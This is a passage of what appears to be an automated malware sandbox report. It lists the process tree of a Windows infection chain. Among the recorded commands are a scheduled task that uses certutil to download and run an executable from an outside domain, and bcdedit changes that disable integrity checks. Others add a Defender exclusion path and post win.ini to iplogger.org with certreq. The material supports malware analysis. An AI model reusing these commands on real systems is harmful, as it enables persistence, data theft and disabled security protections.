                                                  C:\Windows\rss\csrss.exe /15-15
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Modifies data under HKEY_USERS
                                                  PID:5372
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5372 -s 360
                                                    4⤵
                                                    • Program crash
                                                    PID:5612
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5372 -s 364
                                                    4⤵
                                                    • Program crash
                                                    PID:5704
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5372 -s 400
                                                    4⤵
                                                    • Program crash
                                                    PID:5760
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5372 -s 624
                                                    4⤵
                                                    • Program crash
                                                    PID:5920
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5372 -s 664
                                                    4⤵
                                                    • Program crash
                                                    PID:6012
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5372 -s 704
                                                    4⤵
                                                    • Program crash
                                                    PID:6080
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5372 -s 596
                                                    4⤵
                                                    • Program crash
                                                    PID:6132
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5372 -s 716
                                                    4⤵
                                                    • Program crash
                                                    PID:4276
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5372 -s 704
                                                    4⤵
                                                    • Program crash
                                                    PID:4280
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5372 -s 828
                                                    4⤵
                                                    • Program crash
                                                    PID:5304
                                                  • C:\Windows\SYSTEM32\schtasks.exe
                                                    schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                                    4⤵
                                                    • Creates scheduled task(s)
                                                    PID:5364
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5372 -s 856
                                                    4⤵
                                                    • Program crash
                                                    PID:5412
                                                  • C:\Windows\SYSTEM32\schtasks.exe
                                                    schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
                                                    4⤵
                                                    • Creates scheduled task(s)
                                                    PID:5452
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5372 -s 880
                                                    4⤵
                                                    • Program crash
                                                    PID:5752
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5372 -s 836
                                                    4⤵
                                                    • Program crash
                                                    PID:5520
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5372 -s 972
                                                    4⤵
                                                    • Program crash
                                                    PID:5636
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5372 -s 1228
                                                    4⤵
                                                    • Program crash
                                                    PID:5696
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5372 -s 1532
                                                    4⤵
                                                    • Program crash
                                                    PID:5796
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5372 -s 1484
                                                    4⤵
                                                    • Program crash
                                                    PID:6000
                                                  • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
                                                    4⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    PID:6068
                                                    • C:\Windows\system32\bcdedit.exe
                                                      C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
                                                      5⤵
                                                      • Modifies boot configuration data using bcdedit
                                                      PID:4308
                                                    • C:\Windows\system32\bcdedit.exe
                                                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
                                                      5⤵
                                                      • Modifies boot configuration data using bcdedit
                                                      PID:7032
                                                    • C:\Windows\system32\bcdedit.exe
                                                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
                                                      5⤵
                                                      • Modifies boot configuration data using bcdedit
                                                      PID:6880
                                                    • C:\Windows\system32\bcdedit.exe
                                                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
                                                      5⤵
                                                      • Modifies boot configuration data using bcdedit
                                                      PID:4560
                                                    • C:\Windows\system32\bcdedit.exe
                                                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
                                                      5⤵
                                                      • Modifies boot configuration data using bcdedit
                                                      PID:6868
                                                    • C:\Windows\system32\bcdedit.exe
                                                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
                                                      5⤵
                                                      • Modifies boot configuration data using bcdedit
                                                      PID:4324
                                                    • C:\Windows\system32\bcdedit.exe
                                                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
                                                      5⤵
                                                      • Modifies boot configuration data using bcdedit
                                                      PID:5464
                                                    • C:\Windows\system32\bcdedit.exe
                                                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
                                                      5⤵
                                                      • Modifies boot configuration data using bcdedit
                                                      PID:6800
                                                    • C:\Windows\system32\bcdedit.exe
                                                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
                                                      5⤵
                                                      • Modifies boot configuration data using bcdedit
                                                      PID:1616
                                                    • C:\Windows\system32\bcdedit.exe
                                                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
                                                      5⤵
                                                      • Modifies boot configuration data using bcdedit
                                                      PID:6852
                                                    • C:\Windows\system32\bcdedit.exe
                                                      C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
                                                      5⤵
                                                      • Modifies boot configuration data using bcdedit
                                                      PID:6552
                                                    • C:\Windows\system32\bcdedit.exe
                                                      C:\Windows\system32\bcdedit.exe -timeout 0
                                                      5⤵
                                                      • Modifies boot configuration data using bcdedit
                                                      PID:6760
                                                    • C:\Windows\system32\bcdedit.exe
                                                      C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
                                                      5⤵
                                                      • Modifies boot configuration data using bcdedit
                                                      PID:7284
                                                    • C:\Windows\system32\bcdedit.exe
                                                      C:\Windows\system32\bcdedit.exe -set bootmenupolicy legacy
                                                      5⤵
                                                      • Modifies boot configuration data using bcdedit
                                                      PID:7432
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5372 -s 1608
                                                    4⤵
                                                    • Program crash
                                                    PID:4912
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5372 -s 1504
                                                    4⤵
                                                    • Program crash
                                                    PID:4860
                                                  • C:\Windows\System32\bcdedit.exe
                                                    C:\Windows\Sysnative\bcdedit.exe /v
                                                    4⤵
                                                    • Modifies boot configuration data using bcdedit
                                                    PID:7672
                                                  • C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
                                                    C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
                                                    4⤵
                                                      PID:5824
                                              • C:\Users\Admin\AppData\Local\Temp\30E9.exe
                                                C:\Users\Admin\AppData\Local\Temp\30E9.exe
                                                1⤵
                                                • Executes dropped EXE
                                                PID:860
                                                • C:\Users\Admin\AppData\Local\Temp\is-OC8JE.tmp\30E9.tmp
                                                  "C:\Users\Admin\AppData\Local\Temp\is-OC8JE.tmp\30E9.tmp" /SL5="$802B6,442598,358912,C:\Users\Admin\AppData\Local\Temp\30E9.exe"
                                                  2⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  PID:4348
                                                  • C:\Users\Admin\AppData\Local\Temp\is-0B05F.tmp\kkkk.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\is-0B05F.tmp\kkkk.exe" /S /UID=lab212
                                                    3⤵
                                                    • Drops file in Drivers directory
                                                    • Executes dropped EXE
                                                    • Adds Run key to start application
                                                    • Drops file in Program Files directory
                                                    PID:4344
                                                    • C:\Program Files\Windows NT\GLZYMDQSUS\prolab.exe
                                                      "C:\Program Files\Windows NT\GLZYMDQSUS\prolab.exe" /VERYSILENT
                                                      4⤵
                                                      • Executes dropped EXE
                                                      PID:1512
                                                      • C:\Users\Admin\AppData\Local\Temp\is-UJ26F.tmp\prolab.tmp
                                                        "C:\Users\Admin\AppData\Local\Temp\is-UJ26F.tmp\prolab.tmp" /SL5="$80310,575243,216576,C:\Program Files\Windows NT\GLZYMDQSUS\prolab.exe" /VERYSILENT
                                                        5⤵
                                                        • Executes dropped EXE
                                                        • Drops file in Program Files directory
                                                        • Suspicious use of FindShellTrayWindow
                                                        PID:3616
                                                    • C:\Users\Admin\AppData\Local\Temp\b5-e88e7-076-89c90-b7cb0e318cbb1\Toshowesycae.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\b5-e88e7-076-89c90-b7cb0e318cbb1\Toshowesycae.exe"
                                                      4⤵
                                                      • Executes dropped EXE
                                                      PID:1468
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\o4trkqs4.kzo\GcleanerWW.exe /mixone & exit
                                                        5⤵
                                                          PID:5484
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1zqovwlv.xl5\privacytools5.exe & exit
                                                          5⤵
                                                            PID:5824
                                                            • C:\Users\Admin\AppData\Local\Temp\1zqovwlv.xl5\privacytools5.exe
                                                              C:\Users\Admin\AppData\Local\Temp\1zqovwlv.xl5\privacytools5.exe
                                                              6⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of SetThreadContext
                                                              PID:5980
                                                              • C:\Users\Admin\AppData\Local\Temp\1zqovwlv.xl5\privacytools5.exe
                                                                C:\Users\Admin\AppData\Local\Temp\1zqovwlv.xl5\privacytools5.exe
                                                                7⤵
                                                                • Executes dropped EXE
                                                                • Loads dropped DLL
                                                                • Checks SCSI registry key(s)
                                                                PID:5156
                                                          • C:\Windows\System32\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\l5srpny5.ccb\setup.exe /8-2222 & exit
                                                            5⤵
                                                              PID:5708
                                                              • C:\Users\Admin\AppData\Local\Temp\l5srpny5.ccb\setup.exe
                                                                C:\Users\Admin\AppData\Local\Temp\l5srpny5.ccb\setup.exe /8-2222
                                                                6⤵
                                                                  PID:5888
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Ancient-Wave"
                                                                    7⤵
                                                                      PID:5776
                                                                    • C:\Program Files (x86)\Ancient-Wave\7za.exe
                                                                      "C:\Program Files (x86)\Ancient-Wave\7za.exe" e -p154.61.71.13 winamp-plugins.7z
                                                                      7⤵
                                                                        PID:6140
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        "C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Ancient-Wave\setup.exe" -map "C:\Program Files (x86)\Ancient-Wave\WinmonProcessMonitor.sys""
                                                                        7⤵
                                                                          PID:5140
                                                                          • C:\Program Files (x86)\Ancient-Wave\setup.exe
                                                                            "C:\Program Files (x86)\Ancient-Wave\setup.exe" -map "C:\Program Files (x86)\Ancient-Wave\WinmonProcessMonitor.sys"
                                                                            8⤵
                                                                              PID:4408
                                                                          • C:\Program Files (x86)\Ancient-Wave\7za.exe
                                                                            "C:\Program Files (x86)\Ancient-Wave\7za.exe" e -p154.61.71.13 winamp.7z
                                                                            7⤵
                                                                              PID:1072
                                                                            • C:\Program Files (x86)\Ancient-Wave\setup.exe
                                                                              "C:\Program Files (x86)\Ancient-Wave\setup.exe" /8-2222
                                                                              7⤵
                                                                                PID:7484
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5ggsbmpa.joj\MultitimerFour.exe & exit
                                                                            5⤵
                                                                              PID:5584
                                                                              • C:\Users\Admin\AppData\Local\Temp\5ggsbmpa.joj\MultitimerFour.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\5ggsbmpa.joj\MultitimerFour.exe
                                                                                6⤵
                                                                                  PID:5884
                                                                                  • C:\Users\Admin\AppData\Local\Temp\8TW129OFY5\multitimer.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\8TW129OFY5\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 104
                                                                                    7⤵
                                                                                      PID:5840
                                                                                      • C:\Users\Admin\AppData\Local\Temp\8TW129OFY5\multitimer.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\8TW129OFY5\multitimer.exe" 1 3.1615014934.60432c169aad2 104
                                                                                        8⤵
                                                                                          PID:4940
                                                                                          • C:\Users\Admin\AppData\Local\Temp\8TW129OFY5\multitimer.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\8TW129OFY5\multitimer.exe" 2 3.1615014934.60432c169aad2
                                                                                            9⤵
                                                                                              PID:5400
                                                                                              • C:\Users\Admin\AppData\Local\Temp\40u10n3ue4r\safebits.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\40u10n3ue4r\safebits.exe" /S /pubid=1 /subid=451
                                                                                                10⤵
                                                                                                  PID:4448
                                                                                                • C:\Users\Admin\AppData\Local\Temp\g0d4gb2aiii\oqvh1wbnr3q.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\g0d4gb2aiii\oqvh1wbnr3q.exe" /VERYSILENT
                                                                                                  10⤵
                                                                                                    PID:4440
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-LVV5V.tmp\oqvh1wbnr3q.tmp
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-LVV5V.tmp\oqvh1wbnr3q.tmp" /SL5="$10384,870426,780800,C:\Users\Admin\AppData\Local\Temp\g0d4gb2aiii\oqvh1wbnr3q.exe" /VERYSILENT
                                                                                                      11⤵
                                                                                                        PID:5128
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-OJ2PA.tmp\winlthst.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-OJ2PA.tmp\winlthst.exe" test1 test1
                                                                                                          12⤵
                                                                                                            PID:6524
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\YKPDCSw3C.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\YKPDCSw3C.exe"
                                                                                                              13⤵
                                                                                                                PID:6972
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im YKPDCSw3C.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\YKPDCSw3C.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                  14⤵
                                                                                                                    PID:8008
                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                      taskkill /im YKPDCSw3C.exe /f
                                                                                                                      15⤵
                                                                                                                      • Kills process with taskkill
                                                                                                                      PID:7380
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\p1svrpjfm1g\vict.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\p1svrpjfm1g\vict.exe" /VERYSILENT /id=535
                                                                                                            10⤵
                                                                                                              PID:2672
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-31QPR.tmp\vict.tmp
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-31QPR.tmp\vict.tmp" /SL5="$20364,870426,780800,C:\Users\Admin\AppData\Local\Temp\p1svrpjfm1g\vict.exe" /VERYSILENT /id=535
                                                                                                                11⤵
                                                                                                                  PID:1796
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-7EDIR.tmp\wimapi.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-7EDIR.tmp\wimapi.exe" 535
                                                                                                                    12⤵
                                                                                                                      PID:6608
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\DjSKHd4G3.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\DjSKHd4G3.exe"
                                                                                                                        13⤵
                                                                                                                          PID:2320
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im DjSKHd4G3.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\DjSKHd4G3.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                            14⤵
                                                                                                                              PID:8056
                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                taskkill /im DjSKHd4G3.exe /f
                                                                                                                                15⤵
                                                                                                                                • Kills process with taskkill
                                                                                                                                PID:5940
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\45glw0vsqgd\wslw5ru1oip.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\45glw0vsqgd\wslw5ru1oip.exe" /ustwo INSTALL
                                                                                                                      10⤵
                                                                                                                        PID:1156
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1156 -s 656
                                                                                                                          11⤵
                                                                                                                          • Program crash
                                                                                                                          PID:4812
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1156 -s 672
                                                                                                                          11⤵
                                                                                                                          • Program crash
                                                                                                                          PID:4292
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1156 -s 680
                                                                                                                          11⤵
                                                                                                                          • Program crash
                                                                                                                          PID:6676
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1156 -s 812
                                                                                                                          11⤵
                                                                                                                          • Program crash
                                                                                                                          PID:7144
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1156 -s 876
                                                                                                                          11⤵
                                                                                                                          • Program crash
                                                                                                                          PID:4508
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1156 -s 960
                                                                                                                          11⤵
                                                                                                                          • Program crash
                                                                                                                          PID:5668
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1156 -s 1080
                                                                                                                          11⤵
                                                                                                                          • Program crash
                                                                                                                          PID:6932
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\zaopkfo1em2\askinstall24.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\zaopkfo1em2\askinstall24.exe"
                                                                                                                        10⤵
                                                                                                                          PID:1260
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                            11⤵
                                                                                                                              PID:6916
                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                taskkill /f /im chrome.exe
                                                                                                                                12⤵
                                                                                                                                • Kills process with taskkill
                                                                                                                                PID:6500
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\zowjwbwk3ml\chashepro3.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\zowjwbwk3ml\chashepro3.exe" /VERYSILENT
                                                                                                                            10⤵
                                                                                                                              PID:5180
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-9CTM3.tmp\chashepro3.tmp
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-9CTM3.tmp\chashepro3.tmp" /SL5="$3038A,2015144,58368,C:\Users\Admin\AppData\Local\Temp\zowjwbwk3ml\chashepro3.exe" /VERYSILENT
                                                                                                                                11⤵
                                                                                                                                  PID:3720
                                                                                                                                  • C:\Program Files (x86)\JCleaner\8.exe
                                                                                                                                    "C:\Program Files (x86)\JCleaner\8.exe"
                                                                                                                                    12⤵
                                                                                                                                      PID:6128
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        "C:\Windows\System32\cmd.exe" /c echo grYNxrw
                                                                                                                                        13⤵
                                                                                                                                          PID:6828
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          "C:\Windows\System32\cmd.exe" /c cmd < Nemica.sys
                                                                                                                                          13⤵
                                                                                                                                            PID:6820
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              cmd
                                                                                                                                              14⤵
                                                                                                                                                PID:4544
                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            "powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1EaGq7"
                                                                                                                                            12⤵
                                                                                                                                              PID:4408
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              "cmd.exe" /c "start https://iplogger.org/1EaGq7"
                                                                                                                                              12⤵
                                                                                                                                                PID:4428
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                "cmd.exe" /c certreq -post -config https://iplogger.org/1EaGq7 %windir%\\win.ini %temp%\\2 & del %temp%\\2
                                                                                                                                                12⤵
                                                                                                                                                  PID:6096
                                                                                                                                                  • C:\Windows\SysWOW64\certreq.exe
                                                                                                                                                    certreq -post -config https://iplogger.org/1EaGq7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\2
                                                                                                                                                    13⤵
                                                                                                                                                      PID:7116
                                                                                                                                                  • C:\Program Files (x86)\JCleaner\Venita.exe
                                                                                                                                                    "C:\Program Files (x86)\JCleaner\Venita.exe"
                                                                                                                                                    12⤵
                                                                                                                                                      PID:6044
                                                                                                                                                      • C:\Program Files (x86)\JCleaner\Venita.exe
                                                                                                                                                        "{path}"
                                                                                                                                                        13⤵
                                                                                                                                                          PID:7372
                                                                                                                                                      • C:\Program Files (x86)\JCleaner\Abbas.exe
                                                                                                                                                        "C:\Program Files (x86)\JCleaner\Abbas.exe"
                                                                                                                                                        12⤵
                                                                                                                                                          PID:4412
                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          "powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1aSny7"
                                                                                                                                                          12⤵
                                                                                                                                                            PID:5928
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            "cmd.exe" /c "start https://iplogger.org/1aSny7"
                                                                                                                                                            12⤵
                                                                                                                                                              PID:5596
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              "cmd.exe" /c certreq -post -config https://iplogger.org/1aSny7 %windir%\\win.ini %temp%\\2 & del %temp%\\2
                                                                                                                                                              12⤵
                                                                                                                                                                PID:5416
                                                                                                                                                                • C:\Windows\SysWOW64\certreq.exe
                                                                                                                                                                  certreq -post -config https://iplogger.org/1aSny7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\2
                                                                                                                                                                  13⤵
                                                                                                                                                                    PID:7124
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\gyhzecbwvoi\abekdcwrt0q.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\gyhzecbwvoi\abekdcwrt0q.exe" 57a764d042bf8
                                                                                                                                                              10⤵
                                                                                                                                                                PID:2312
                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k "C:\Program Files\W2ODD5ZF4H\W2ODD5ZF4.exe" 57a764d042bf8 & exit
                                                                                                                                                                  11⤵
                                                                                                                                                                    PID:6964
                                                                                                                                                                    • C:\Program Files\W2ODD5ZF4H\W2ODD5ZF4.exe
                                                                                                                                                                      "C:\Program Files\W2ODD5ZF4H\W2ODD5ZF4.exe" 57a764d042bf8
                                                                                                                                                                      12⤵
                                                                                                                                                                        PID:6896
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\dyjypdma133\4mbrjmqb2h1.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\dyjypdma133\4mbrjmqb2h1.exe" testparams
                                                                                                                                                                    10⤵
                                                                                                                                                                      PID:2264
                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\pouyalmce52\q41fmb4vin5.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\pouyalmce52\q41fmb4vin5.exe" /VERYSILENT /p=testparams
                                                                                                                                                                        11⤵
                                                                                                                                                                          PID:6692
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-J95C0.tmp\q41fmb4vin5.tmp
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-J95C0.tmp\q41fmb4vin5.tmp" /SL5="$3038C,404973,58368,C:\Users\Admin\AppData\Roaming\pouyalmce52\q41fmb4vin5.exe" /VERYSILENT /p=testparams
                                                                                                                                                                            12⤵
                                                                                                                                                                              PID:4644
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\41sdyr1eqyt\Setup3310.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\41sdyr1eqyt\Setup3310.exe" /Verysilent /subid=577
                                                                                                                                                                          10⤵
                                                                                                                                                                            PID:5312
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-PAPI2.tmp\Setup3310.tmp
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-PAPI2.tmp\Setup3310.tmp" /SL5="$302F8,802346,56832,C:\Users\Admin\AppData\Local\Temp\41sdyr1eqyt\Setup3310.exe" /Verysilent /subid=577
                                                                                                                                                                              11⤵
                                                                                                                                                                                PID:5588
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-2ITCO.tmp\Setup.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-2ITCO.tmp\Setup.exe" /Verysilent
                                                                                                                                                                                  12⤵
                                                                                                                                                                                    PID:4936
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\3zpjfeoju5c\vpn.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\3zpjfeoju5c\vpn.exe" /silent /subid=482
                                                                                                                                                                                10⤵
                                                                                                                                                                                  PID:5992
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-41M83.tmp\vpn.tmp
                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-41M83.tmp\vpn.tmp" /SL5="$1044C,15170975,270336,C:\Users\Admin\AppData\Local\Temp\3zpjfeoju5c\vpn.exe" /silent /subid=482
                                                                                                                                                                                    11⤵
                                                                                                                                                                                      PID:5968
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                                                                                                                                        12⤵
                                                                                                                                                                                          PID:364
                                                                                                                                                                                          • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                                                                            tapinstall.exe remove tap0901
                                                                                                                                                                                            13⤵
                                                                                                                                                                                              PID:4284
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                                                                                                                                            12⤵
                                                                                                                                                                                              PID:4212
                                                                                                                                                                                              • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                                                                                tapinstall.exe install OemVista.inf tap0901
                                                                                                                                                                                                13⤵
                                                                                                                                                                                                  PID:7852
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\ue02b4um50n\IBInstaller_97039.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\ue02b4um50n\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
                                                                                                                                                                                            10⤵
                                                                                                                                                                                              PID:5768
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-0RFL3.tmp\IBInstaller_97039.tmp
